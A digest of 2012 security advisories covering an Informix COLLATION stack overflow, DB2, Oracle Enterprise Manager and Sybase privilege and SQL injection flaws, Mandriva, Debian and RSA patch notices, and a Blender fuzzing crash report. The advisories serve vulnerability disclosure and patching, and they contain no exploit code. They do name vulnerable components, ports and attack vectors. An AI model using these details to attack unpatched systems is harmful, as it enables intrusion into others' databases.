[DCA-2011-0013] - IBM Informix Dynamic Server 11.50 SET COLLATION Stack OverFlow
IBM Informix Dynamic Server 11.50 SET COLLATION Stack OverFlow [DCA-2011-0013] [Discussion] - DcLabs Security Research Group advises about the following vulnerability(ies): [Software/Hardware] - IBM Informix [Vendor Product Description] IBM Informix is a family of relational database management system (RDBMS) developed by IBM. It is positioned as IBM's flagship data server for online transaction processing (OLTP) as well as integrated solutions. IBM acquired the Informix technology in 2001.[1] [1] Source: http://en.wikipedia.org/wiki/IBM_Informix [Advisory Timeline] Sent to vendor [10/21/2011] Automatic Vendor Reply Sent to vendor [09/06/2012] Vendor reply [11/06/2012] Sent to BugTrack after IBM disclosure without DcLabs credits [10/04/2012] [Bug Summary] The specific flaw exists within the oninit process bound to TCP port 9088 when processing the arguments to the COLLATION option in a SQL query. User-supplied data is copied into a stack-based buffer without proper bounds checking resulting in an overflow. The vulnerability may/might result in possible arbitrary code execution under the context of the database server [Impact] Medium [Affected Version] 11.70 11.50 Previous Versions may also be vulnerable [OS Platforms tested] Windows XP SP3, Windows 2003 R2 RedHat Enterprise 6, Centos 5.3 [Evidences] http://www.youtube.com/watch?v=3tjjHi6XC7I - Informix 10.70 http://www.youtube.com/watch?v=eVm4bUio_Pc - Informix 11.70 -- Ewerson Guimaraes (Crash) Pentester/Researcher DcLabs Security Team www.dclabs.com.br
Team SHATTER Security Advisory: XML file disclosure vulnerability via GET_WRAP_CFG_C and GET_WRAP_CFG_C2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 AppSecInc Team SHATTER Security Advisory XML file disclosure vulnerability via GET_WRAP_CFG_C and GET_WRAP_CFG_C2 system stored procedures. Risk Level: Medium Affected versions: IBM DB2 LUW 9.1, 9.5, 9.7, 10.1 Remote exploitable: No Credits: This vulnerability was discovered and researched by Martin Rakhmanov of Application Security Inc. Details: Two system stored procedures executable by PUBLIC allow reading files with xml extension on the server. To exploit this vulnerability the xml file should be readable by the DB2 fenced user. Impact: Authenticated database users can read xml files accessible to the DB2 fenced process. Vendor Status: Vendor was contacted and a patch was released. Workaround: Revoke EXECUTE privilege on GET_WRAP_CFG_C and GET_WRAP_CFG_C2 system stored procedures from PUBLIC. Fix: IBM DB2 LUW 9.1: apply Fix Pack 12. IBM DB2 LUW 9.5: apply Fix Pack 10. IBM DB2 LUW 9.7: no fix yet. IBM DB2 LUW 10.1: apply Fix Pack 1. CVE: CVE-2012-2196 Links: https://www.teamshatter.com/?p=3912 https://www-304.ibm.com/support/docview.wss?uid=swg21607618 Timeline: Vendor Notification - 05/27/2012 Vendor Response - 05/29/2012 Fix - 08/14/2012 Public Disclosure - 10/04/2012 - -- _ Copyright (c) 2012 Application Security, Inc. http://www.appsecinc.com About Application Security, Inc. AppSecInc is a pioneer and leading provider of database security solutions for the enterprise. By providing strategic and scalable software-only solutions - AppDetectivePro for auditors and IT advisors, and DbProtect for the enterprise - AppSecInc supports the database security lifecycle for some of the most complex and demanding environments in the world across more than 1,300 active commercial and government customers. Leveraging the world's most comprehensive database security knowledgebase from the company's renowned team of threat researchers, TeamSHATTER, AppSecInc products help customers achieve unprecedented levels of data security from nefarious or accidental activities, while reducing overall risk and helping to ensure continuous regulatory and industry compliance. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (MingW32) iEYEARECAAYFAlBuProACgkQRx91imnNIgHIeQCfW3uCzj1B5odf5d6b4DmEeY2v F7wAn28nbYpU+SKkqrSe2u+BNZxa3ZMP =6K1U -END PGP SIGNATURE-
Team SHATTER Security Advisory: Multiple SQL Injection in Oracle Enterprise Manager (SQL Tunning Sets components)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 AppSecInc Team SHATTER Security Advisory Multiple SQL Injection in Oracle Enterprise Manager (SQL Tunning Sets components). Risk Level: High Affected versions: Oracle Enterprise Manager Database Control 11.1.0.7, 11.2.0.3 (and previous patchsets) Remote exploitable: Yes Credits: This vulnerability was discovered and researched by Esteban Martinez Fayo of Application Security Inc. Details: SQL Injection works by attempting to modify the parameters passed to an application to change the SQL statements that are passed to a database. SQL injection can be used to insert additional SQL statements to be executed. There are multiple SQL Injection vulnerabilities in components of SQL Tunning Sets that can be abused to perform attacks to execute SQL statements with elevated privileges. The SQL Injection can be exploited by convincing the Oracle Enterprise Manager user to click on a malicious link or visit a web site with malicious content (Cross-site request forgery attack). Impact: An attacker that convinces an Oracle Enterprise Manager user to click or open a malicious link can impersonate the user and execute SQL statements. Vendor Status: Vendor was contacted and a patch was released. Workaround: There is no workaround for this vulnerability. Fix: Apply Oracle Critical Patch Update July 2012 available at Oracle Support. CVE: CVE-2012-1737 Links: https://www.teamshatter.com/?p=3919 http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html - -- Timeline: Vendor Notification - 5/30/2011 Vendor Response - 6/10/2011 Fix - 7/17/2012 Public Disclosure - 10/04/2012 - -- _ Copyright (c) 2012 Application Security, Inc. http://www.appsecinc.com About Application Security, Inc. AppSecInc is a pioneer and leading provider of database security solutions for the enterprise. By providing strategic and scalable software-only solutions - AppDetectivePro for auditors and IT advisors, and DbProtect for the enterprise - AppSecInc supports the database security lifecycle for some of the most complex and demanding environments in the world across more than 1,300 active commercial and government customers. Leveraging the world's most comprehensive database security knowledgebase from the company's renowned team of threat researchers, TeamSHATTER, AppSecInc products help customers achieve unprecedented levels of data security from nefarious or accidental activities, while reducing overall risk and helping to ensure continuous regulatory and industry compliance. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (MingW32) iEYEARECAAYFAlBuOW8ACgkQRx91imnNIgEZ3QCfe3Cy9SLij1DUfEjZQi6VPhP/ 3EgAoIEhMncLNDeZ3qT+EDgwi9fT5TxN =S/Sn -END PGP SIGNATURE-
Team SHATTER Security Advisory: Elevated roles through DBCC
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 AppSecInc Team SHATTER Security Advisory Elevated roles through DBCC Risk Level: High Affected versions: Sybase ASE 15.0, 15.5, 15.7 Remote exploitable: No Credits: This vulnerability was discovered and researched by Martin Rakhmanov of Application Security Inc. Details: Authenticated users can elevate privileges to any role via SQL injection in one of the DBCC commands. Impact: Authenticated users can elevate privileges to any role. Vendor Status: Vendor was contacted and a patch was released. Workaround: None. Fix: Sybase ASE 15.0: apply ESD#4.1. Sybase ASE 15.5: apply ESD#5.1. Sybase ASE 15.7: apply ESD#1. Links: https://www.teamshatter.com/?p=3903 http://www.sybase.com/detail?id=1098877 Timeline: Vendor Notification - 11/03/2011 Vendor Response - 11/10/2011 Fix - 07/25/2012 Public Disclosure - 10/04/2012 - -- _ Copyright (c) 2012 Application Security, Inc. http://www.appsecinc.com About Application Security, Inc. AppSecInc is a pioneer and leading provider of database security solutions for the enterprise. By providing strategic and scalable software-only solutions - AppDetectivePro for auditors and IT advisors, and DbProtect for the enterprise - AppSecInc supports the database security lifecycle for some of the most complex and demanding environments in the world across more than 1,300 active commercial and government customers. Leveraging the world's most comprehensive database security knowledgebase from the company's renowned team of threat researchers, TeamSHATTER, AppSecInc products help customers achieve unprecedented levels of data security from nefarious or accidental activities, while reducing overall risk and helping to ensure continuous regulatory and industry compliance. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (MingW32) iEYEARECAAYFAlBuPqwACgkQRx91imnNIgENJQCg2DtMDCT9BaD6bol+mOu+/wiF BI0AnjLM3oSmTLC0RN70f3ep3VINnvhx =80QX -END PGP SIGNATURE-
Team SHATTER Security Advisory: Java Operating System command execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 AppSecInc Team SHATTER Security Advisory Java Operating System command execution. Risk Level: High Affected versions: Sybase ASE 15.0, 15.5 and 15.7 Remote exploitable: Yes Credits: This vulnerability was discovered and researched by Esteban Martinez Fayo of Application Security Inc. Details: It is possible to execute Operating System commands using the Java call Runtime.getRuntime().exec(). Impact: Any low privileged database user can execute Operating System commands on the Sybase server host with the privilege of the Sybase server process. The attack requires that Java is installed and enabled on Sybase ASE. Vendor Status: Vendor was contacted and a patch was released. Workaround: There is no workaround for this vulnerability. Fix: Apply the following ESD depending on the Sybase ASE version: 15.0.3: ESD#4.1 15.5: ESD#5.1 15.7: ESD#1 Refresh 1, ESD#1 Refresh 2 Links: https://www.teamshatter.com/?p=3909 http://www.sybase.com/detail?id=1098877 - -- Timeline: Vendor Notification - 11/23/2011 Vendor Response - 12/01/2011 Fix - 7/25/2012 Public Disclosure - 10/04/2012 - -- _ Copyright (c) 2012 Application Security, Inc. http://www.appsecinc.com About Application Security, Inc. AppSecInc is a pioneer and leading provider of database security solutions for the enterprise. By providing strategic and scalable software-only solutions - AppDetectivePro for auditors and IT advisors, and DbProtect for the enterprise - AppSecInc supports the database security lifecycle for some of the most complex and demanding environments in the world across more than 1,300 active commercial and government customers. Leveraging the world's most comprehensive database security knowledgebase from the company's renowned team of threat researchers, TeamSHATTER, AppSecInc products help customers achieve unprecedented levels of data security from nefarious or accidental activities, while reducing overall risk and helping to ensure continuous regulatory and industry compliance. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (MingW32) iEYEARECAAYFAlBuOTcACgkQRx91imnNIgELFQCgmnkTL42PB34oN1eSeC+ayGHp MxoAoJEbAcT3ARhC35zUlyc4njlQuiJO =FthR -END PGP SIGNATURE-
[ MDVSA-2012:151-1 ] ghostscript
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:151-1 http://www.mandriva.com/security/ ___ Package : ghostscript Date: October 5, 2012 Affected: 2011. ___ Problem Description: A security issue was identified and fixed in ghostscript: An integer overflow flaw, leading to a heap-based buffer overflow, was found in Ghostscript#039;s International Color Consortium Format library (icclib). An attacker could create a specially-crafted PostScript or PDF file with embedded images that would cause Ghostscript to crash or, potentially, execute arbitrary code with the privileges of the user running Ghostscript (CVE-2012-4405). The updated packages have been patched to correct this issue. Update: Packages for Mandriva Linux 2011 is being provided. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4405 ___ Updated Packages: Mandriva Linux 2011: b278dfabdfbac34c246e40b38e85ccec 2011/i586/ghostscript-9.02-1.1-mdv2011.0.i586.rpm bc828255a307c87ed0a5d46f60e57a93 2011/i586/ghostscript-common-9.02-1.1-mdv2011.0.i586.rpm 7f68d9678e6dad3002b93b611b307239 2011/i586/ghostscript-doc-9.02-1.1-mdv2011.0.i586.rpm 3d78015afb7b5327bbeaab19548c0da5 2011/i586/ghostscript-dvipdf-9.02-1.1-mdv2011.0.i586.rpm cc20afcfd48d1290c4fe0f1f1c069501 2011/i586/ghostscript-module-X-9.02-1.1-mdv2011.0.i586.rpm 37070a25052f58d08c6b7eccf66f5ef2 2011/i586/ghostscript-X-9.02-1.1-mdv2011.0.i586.rpm 0f0d91db699e3379b70ef161e9cc8d4b 2011/i586/libgs9-9.02-1.1-mdv2011.0.i586.rpm 18567edd8bfa9238f695f3bcc29a85c3 2011/i586/libgs-devel-9.02-1.1-mdv2011.0.i586.rpm b68482e1e0a2a25c48a3408327efed67 2011/i586/libijs1-0.35-76.1-mdv2011.0.i586.rpm 9702c9bb60b3fde6560aabefe2f1a131 2011/i586/libijs-devel-0.35-76.1-mdv2011.0.i586.rpm e763b3dd6073d717b7f802132bfcd16d 2011/SRPMS/ghostscript-9.02-1.1.src.rpm Mandriva Linux 2011/X86_64: 777aa3e5b4105c9af109ff70975462c7 2011/x86_64/ghostscript-9.02-1.1-mdv2011.0.x86_64.rpm 77855d411b694041a2c3b0ef50cdaa91 2011/x86_64/ghostscript-common-9.02-1.1-mdv2011.0.x86_64.rpm a5837b0df7bd5440c61a68cbf6384cad 2011/x86_64/ghostscript-doc-9.02-1.1-mdv2011.0.x86_64.rpm 8a63ae70d50c6da655fbd5b14f46a26c 2011/x86_64/ghostscript-dvipdf-9.02-1.1-mdv2011.0.x86_64.rpm 76ba47df5717e32adb4eb2f9a8b3ddaf 2011/x86_64/ghostscript-module-X-9.02-1.1-mdv2011.0.x86_64.rpm 196bdb5f04db5028e2dfde55ccfc99c9 2011/x86_64/ghostscript-X-9.02-1.1-mdv2011.0.x86_64.rpm 5a55d8ac0538a7c6b8ba93c8affebd20 2011/x86_64/lib64gs9-9.02-1.1-mdv2011.0.x86_64.rpm 622a318d67f54da350cd13b214491173 2011/x86_64/lib64gs-devel-9.02-1.1-mdv2011.0.x86_64.rpm 00940be7c4807e643ec2b143c6056ecb 2011/x86_64/lib64ijs1-0.35-76.1-mdv2011.0.x86_64.rpm 0a2459eb3921dffc5847b512689dd012 2011/x86_64/lib64ijs-devel-0.35-76.1-mdv2011.0.x86_64.rpm e763b3dd6073d717b7f802132bfcd16d 2011/SRPMS/ghostscript-9.02-1.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFQbr+YmqjQ0CJFipgRAqiYAKDXE6ovQVbqL+CUy31a+q8tIlk69wCggVhk D6iqZJhPu8nHWuUDgbUQzwE= =DELP -END PGP SIGNATURE-
[ MDVSA-2012:150-1 ] java-1.6.0-openjdk
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:150-1 http://www.mandriva.com/security/ ___ Package : java-1.6.0-openjdk Date: October 5, 2012 Affected: 2011. ___ Problem Description: Multiple security issues were identified and fixed in OpenJDK (icedtea6): Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 6 and earlier, and 6 Update 34 and earlier, has no impact and remote attack vectors involving AWT and a security-in-depth issue that is not directly exploitable but which can be used to aggravate security vulnerabilities that can be directly exploited. NOTE: this identifier was assigned by the Oracle CNA, but CVE is not intended to cover defense-in-depth issues that are only exposed by the presence of other vulnerabilities (CVE-2012-0547). Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 6 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Beans, a different vulnerability than CVE-2012-3136 (CVE-2012-1682). The updated packages provides icedtea6-1.11.4 which is not vulnerable to these issues. Update: Packages for Mandriva Linux 2011 is being provided. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0547 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1682 http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html ___ Updated Packages: Mandriva Linux 2011: 409b2a65b6ac01bf537dc87d6fbe0e00 2011/i586/java-1.6.0-openjdk-1.6.0.0-34.b24.1-mdv2011.0.i586.rpm a3b9c036cb42f052e953fee603849bd5 2011/i586/java-1.6.0-openjdk-demo-1.6.0.0-34.b24.1-mdv2011.0.i586.rpm d975875b84f010da17335be5130a7b39 2011/i586/java-1.6.0-openjdk-devel-1.6.0.0-34.b24.1-mdv2011.0.i586.rpm 51978600272cb7ad001b8fa600bd912d 2011/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-34.b24.1-mdv2011.0.i586.rpm 76f83e5164565cb1ec2b84b6d7e96f5b 2011/i586/java-1.6.0-openjdk-src-1.6.0.0-34.b24.1-mdv2011.0.i586.rpm 8fb9bec13e7faca9afbfa35bfa473de7 2011/SRPMS/java-1.6.0-openjdk-1.6.0.0-34.b24.1.src.rpm Mandriva Linux 2011/X86_64: 30a037bcc4114f8f866d701ed765df9e 2011/x86_64/java-1.6.0-openjdk-1.6.0.0-34.b24.1-mdv2011.0.x86_64.rpm 313653aa95969e3eb0d109c709cfdbf6 2011/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-34.b24.1-mdv2011.0.x86_64.rpm 05ad9762cfc7530fb5925757f515ba97 2011/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-34.b24.1-mdv2011.0.x86_64.rpm c56736754f2ec0be60b8929587d0d1a1 2011/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-34.b24.1-mdv2011.0.x86_64.rpm b4c25d4919f099b37cdc6ad5ffc993a4 2011/x86_64/java-1.6.0-openjdk-src-1.6.0.0-34.b24.1-mdv2011.0.x86_64.rpm 8fb9bec13e7faca9afbfa35bfa473de7 2011/SRPMS/java-1.6.0-openjdk-1.6.0.0-34.b24.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFQbs2ymqjQ0CJFipgRAiYKAJwJ0vHw9qGIAftnhgRi6F0fBo5pcACdEDe1 8nLyaEUKimJVHhxnRzaMQgA= =FRGy -END PGP SIGNATURE-
[ MDVSA-2012:160 ] imagemagick
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:160 http://www.mandriva.com/security/ ___ Package : imagemagick Date: October 5, 2012 Affected: 2011., Enterprise Server 5.0 ___ Problem Description: A vulnerability has been found and corrected in imagemagick: The Magick_png_malloc function in coders/png.c in ImageMagick 6.7.8-6 does not use the proper variable type for the allocation size, which might allow remote attackers to cause a denial of service (crash) via a crafted PNG file that triggers incorrect memory allocation (CVE-2012-3437). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3437 ___ Updated Packages: Mandriva Linux 2011: e3c76bded9a774eea31a8e6fe670f9b6 2011/i586/imagemagick-6.7.0.9-1.2-mdv2011.0.i586.rpm e0850b9c33271801e880cc8f34aba0d6 2011/i586/imagemagick-desktop-6.7.0.9-1.2-mdv2011.0.i586.rpm 9d763cf168f088cd295b8dfec0e6c850 2011/i586/imagemagick-doc-6.7.0.9-1.2-mdv2011.0.i586.rpm 89354e093083f69a2ece10439eb9a89c 2011/i586/libmagick4-6.7.0.9-1.2-mdv2011.0.i586.rpm 026e039ee1b2428e3987744d8c0fe132 2011/i586/libmagick-devel-6.7.0.9-1.2-mdv2011.0.i586.rpm ba14a74f5902c7369280ff15d005c42d 2011/i586/perl-Image-Magick-6.7.0.9-1.2-mdv2011.0.i586.rpm 5456e1d122ec21656f07053d35aaee97 2011/SRPMS/imagemagick-6.7.0.9-1.2.src.rpm Mandriva Linux 2011/X86_64: f926991c5980ac2c39ebe4527868c1af 2011/x86_64/imagemagick-6.7.0.9-1.2-mdv2011.0.x86_64.rpm 1e0deadb027234db5e6a1471771daa2e 2011/x86_64/imagemagick-desktop-6.7.0.9-1.2-mdv2011.0.x86_64.rpm ee861a0cf7dba66e042d9b8f0fd70eda 2011/x86_64/imagemagick-doc-6.7.0.9-1.2-mdv2011.0.x86_64.rpm b2a886844058051f141fe15a6e53ff16 2011/x86_64/lib64magick4-6.7.0.9-1.2-mdv2011.0.x86_64.rpm 1f8e6c539b1877742f8e64bfdcecbc4d 2011/x86_64/lib64magick-devel-6.7.0.9-1.2-mdv2011.0.x86_64.rpm 2656e1a7b20dd77dd1deea52863e60f0 2011/x86_64/perl-Image-Magick-6.7.0.9-1.2-mdv2011.0.x86_64.rpm 5456e1d122ec21656f07053d35aaee97 2011/SRPMS/imagemagick-6.7.0.9-1.2.src.rpm Mandriva Enterprise Server 5: f3aba495ee3a944e4e9ccafdfffac131 mes5/i586/imagemagick-6.4.2.10-5.4mdvmes5.2.i586.rpm ba1858f1faf3c7e159ec8eebf558411a mes5/i586/imagemagick-desktop-6.4.2.10-5.4mdvmes5.2.i586.rpm 74a73593b07d82332f9ed7a77a3317f7 mes5/i586/imagemagick-doc-6.4.2.10-5.4mdvmes5.2.i586.rpm 4d5d5b4b7de7dcb477e317ee9604c0c1 mes5/i586/libmagick1-6.4.2.10-5.4mdvmes5.2.i586.rpm cae27a3fa3c1abfcac6495152622149d mes5/i586/libmagick-devel-6.4.2.10-5.4mdvmes5.2.i586.rpm 9d892e3973d374a879ad033ac5a2fada mes5/i586/perl-Image-Magick-6.4.2.10-5.4mdvmes5.2.i586.rpm 98692ccd382085f7419e70475051173b mes5/SRPMS/imagemagick-6.4.2.10-5.4mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: cd0ff0a94a6e5aae6e205f7a28c68da3 mes5/x86_64/imagemagick-6.4.2.10-5.4mdvmes5.2.x86_64.rpm 39046fb7ab97f63c6df0973a40fae4ce mes5/x86_64/imagemagick-desktop-6.4.2.10-5.4mdvmes5.2.x86_64.rpm c63eca56b0a188f49f0584899e512049 mes5/x86_64/imagemagick-doc-6.4.2.10-5.4mdvmes5.2.x86_64.rpm 03608e7eb8ba79563d091178b5de3b60 mes5/x86_64/lib64magick1-6.4.2.10-5.4mdvmes5.2.x86_64.rpm 363f3f3375150377ada47a9f6be761b4 mes5/x86_64/lib64magick-devel-6.4.2.10-5.4mdvmes5.2.x86_64.rpm 17bd98545b888e9d0a1c8e31058fea34 mes5/x86_64/perl-Image-Magick-6.4.2.10-5.4mdvmes5.2.x86_64.rpm 98692ccd382085f7419e70475051173b mes5/SRPMS/imagemagick-6.4.2.10-5.4mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFQbtqVmqjQ0CJFipgRAhYQAKDpLs02NTNkWBB63fg5bvubjTD4ygCeN3Bw IQrU5w9Z06DMH2yFX4mPmdY= =/48G -END PGP SIGNATURE-
[SECURITY] [DSA 2555-1] libxslt security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2555-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff October 05, 2012 http://www.debian.org/security/faq - - Package: libxslt Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2012-2870 CVE-2012-2871 CVE-2012-2893 Nicholas Gregoire and Cris Neckar discovered several memory handling bugs in libxslt, which could lead to denial of service or the execution of arbitrary code if a malformed document is processed. For the stable distribution (squeeze), these problems have been fixed in version 1.1.26-6+squeeze2. For the unstable distribution (sid), these problems have been fixed in version 1.1.26-14. We recommend that you upgrade your libxslt packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlBvDikACgkQXm3vHE4uylqyxQCgoDea5HoIMlTGsyY7j0lSTC41 6goAn3A9XemdHAAH63KnAXeLJq8xfqvJ =5h/g -END PGP SIGNATURE-
ESA-2012-035: RSAR Adaptive Authentication (On-Premise) Information Disclosure Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ESA-2012-035: RSA® Adaptive Authentication (On-Premise) Information Disclosure Vulnerability EMC Identifier: ESA-2012-035 CVE Identifier: CVE-2012-2286 Severity Rating: CVSS v2 Base Score: 7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C) Affected Products: RSA Adaptive Authentication (On-Premise) 6.0.2.1 Summary: RSA Adaptive Authentication (On-Premise) contains a vulnerability that can potentially lead to sensitive information disclosure. Details: RSA Adaptive Authentication (On-Premise) contains a vulnerability that could allow sensitive information disclosure when calling specific components within the application. Recommendation: RSA AAOP (On-Premise) 6.0.2.1 SP3 P3 contains changes that resolve this issue. See the Release Notes for the required configuration changes to enable the fix in your environment. Severity Rating: For an explanation of Severity Ratings, refer to the Knowledge Base Article, Security Advisories Severity Rating at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. Obtaining Downloads: To obtain the latest RSA product downloads, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose download you want to obtain. Scroll to the section for the product download that you want and click on the link. Obtaining Documentation: To obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link. Obtaining More Information: For more information about RSA Adaptive Authentication, visit the RSA web site at http://www.rsa.com/node.aspx?id=3018. Getting Support and Service: For customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab. General Customer Support Information: http://www.rsa.com/node.aspx?id=1264 RSA SecurCare Online: https://knowledge.rsasecurity.com EOPS Policy: RSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details. http://www.rsa.com/node.aspx?id=2575 SecurCare Online Security Advisories RSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided as is without warranty of any kind. RSA disclaim all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. About RSA SecurCare Notes Security Advisories Subscription RSA SecurCare Notes Security Advisories are targeted e-mail messages that RSA sends you based on the RSA product family you currently use. If youd like to stop receiving RSA SecurCare Notes Security Advisories, or if youd like to change which RSA product family Notes Security Advisories you currently receive, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com/scolcms/help.aspx?_v=view3. Following the instructions on the page, remove the check mark next to the RSA product family whose Notes Security Advisories you no longer want to receive. Click the Submit button to save your selection. EMC Product Security Response Center security_al...@emc.com http://www.emc.com/contact-us/contact/product-security-response-center.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (Cygwin) iEYEARECAAYFAlBvHy4ACgkQtjd2rKp+ALzPWQCgg166jG6CigyEMI1O+ovaU6X2 rdYAoMkxJk7obFJAu7Q9PumOJ0iH3wgG =JAgM -END PGP SIGNATURE-
Blender 2.63 Exploitable User Mode Write AV
Description: User Mode Write AV Short Description: WriteAV Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at blender!PyInit_aud+0x003a56cc (Hash=0x23420309.0x667c4642) User mode write access violations that are not near NULL are exploitable. POC Files === Attachments: http://projects.blender.org/tracker/index.php?func=detailaid=32653group_id=9atid=498 Vendor Acknowledged = http://projects.blender.org/tracker/index.php?func=detailaid=32653group_id=9atid=498 Vendor Response We don't care. They do not intend to fix this bug or any other security bug. It only took about 30 minutes to find all of these with a small amount of seed files (around 10) using FOE2: ./EXPLOITABLE/0x23420309.0x667c4642/sf_0378e695403019ae75f46c47a4d71299-47-0x05841040-minimized.blend ./EXPLOITABLE/0x24432e67.0x684e3725/sf_fac171c436911fadb381eb2a9ef0760c-878-0x0ce41000-minimized.blend ./EXPLOITABLE/0x574b491d.0x574b4935/sf_6e55b1a0f2696a0bc4e80cbb468429f0-435-0x00846446-minimized.blend ./EXPLOITABLE/0x655e6416.0x467d0874/sf_c40aa52b109a96a511e9433d4ac56b51-255-0x4c425952-minimized.blend ./PROBABLY_EXPLOITABLE/0x23420309.0x0244045e/sf_9dab7310ddde4fbc4136fdca1fecc00a-978-0x0589-minimized.blend ./PROBABLY_EXPLOITABLE/0x23420309.0x0e4d1e23/sf_fac171c436911fadb381eb2a9ef0760c-15-0x0cd72000-minimized.blend ./PROBABLY_EXPLOITABLE/0x23420309.0x20456162/sf_2f3647f84b4baff07959929aa1c33a5c-394-0x05a3-minimized.blend 